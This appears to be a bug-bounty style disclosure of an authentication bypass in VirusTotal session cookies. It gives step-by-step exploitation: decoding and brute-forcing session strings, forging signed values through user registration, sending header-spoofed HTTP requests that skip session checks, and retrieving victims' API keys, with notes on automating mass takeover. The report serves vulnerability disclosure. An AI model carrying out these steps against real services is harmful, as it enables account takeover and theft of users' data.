Summary:
The bug in VirusTotal's sessions handle mechanism allows to get access to any user account
Product:
https://www.virustotal.com/
Vulnerability type:
Auth Bypass
Details
In order to perform exploitation of the bug an attacker needs VT account, say [REDACTED_EMAIL]. After logging he obtains the
VT_SESSION_ID
cookie:
[REDACTED]
Decode it using base64:
[REDACTED]||1657472422||e39901b640019bfe33dfd0f4a6920bf7af4468cb82c415bb0d8baecce9f1a36Yg
.
Seems, it has format
b64_serialized_string||timestamp||control_hashsum
Let's see at the
b64_serialized_string
of another user with email [REDACTED_EMAIL]:
If you decode these
's (add
=
to the end of the strings before decoding) and compare it, you will see that they differ only in four bytes (see serialized_string_compare.png). I also saw cases, where were 5 distinct bytes.
So, an attacker can bruteforce these 4-5 bytes in order to get valid
's. The problem is that an attacker needs to construct a valid
. It is possible with the user registration mechanism.
Imagine, that an attacker brutrforced
.  He can create new user with any email and username =
.  I did it using account with email
[REDACTED_EMAIL]
(account_creation.PNG).
Look at the confirmation link was sent to email:
https://www.virustotal.com/gui/account-activation/[REDACTED]
Decode it with base64:
[REDACTED]||1657473711||a29ee9e51846b45733518ba6b2a97c88cf97e2b5fad5b8123cabc3e5ecd385fNw
You can see our tampered
with the same format as
and with a valid sign.
To check if this obtained
is tied to any user session an attacker can perform this request:
GET /ui/user_notifications HTTP/2
Host: www.virustotal.com
Cookie: VT_SESSION_ID=[REDACTED]
X-Vt-Anti-Abuse-Header: 0
User-Agent: 0
Accept-Ianguage: 0
X-Tool: 0
Referer: http://127.0.0.1
Using provided headers it is possible to skip checks of
VT_SESSION_HASH
cookie and
X-Session-Hash
,
X-Vt-Anti-Abuse-Header
headers. The interesting thing is that behavior depends on the
Referrer
header.
If the request is succeeded, in response you can see links with the username ([REDACTED_USERNAME]):
"links": {
"self": "
https://www.virustotal.com/ui/users/[REDACTED_USERNAME]/notifications?limit=10"
"next": "
https://www.virustotal.com/ui/users/[REDACTED_USERNAME]1notifications?cursor=CjsSNWoRc352aXJ1c3RvdGFsY2xvdWRyIAsSEFVzZXJOb3RpZmljYXRpb24iCjIwMjAxMTI2MDEMGAAgAQ%3D%3D&limit=10"
}
And finally, an attacker can perform this request to obtain secret user data (access token):
GET /ui/users/[REDACTED_USERNAME] HTTP/2
{
"data": {
"attributes": {
"status": "active",
"first_name": "[REDACTED_USERNAME]",
"apikey": "
444b040499ac70a7ab8985105d139500782fa0e2270d52626036d3470c464d3e
"
So, an attacker can use this technique to compromise the mass of the VirusTotal accounts. He can create his email server to generate unlimited emails for accounts registration. The only complexity is to bypass the rate limit and Google-captcha while performing user registration requests, but it is possible with the 3rd party services. Other mentioned requests are not rate-limited.
And of course this attack may be automated.
Attack scenario
Any attacker can exploit it in order to compromise the mass of VT accounts. Then he can steal sensitive users data like private hunting rules or graphs, also, he can use VT API spending victim's quota, including VT Enterprise functionality.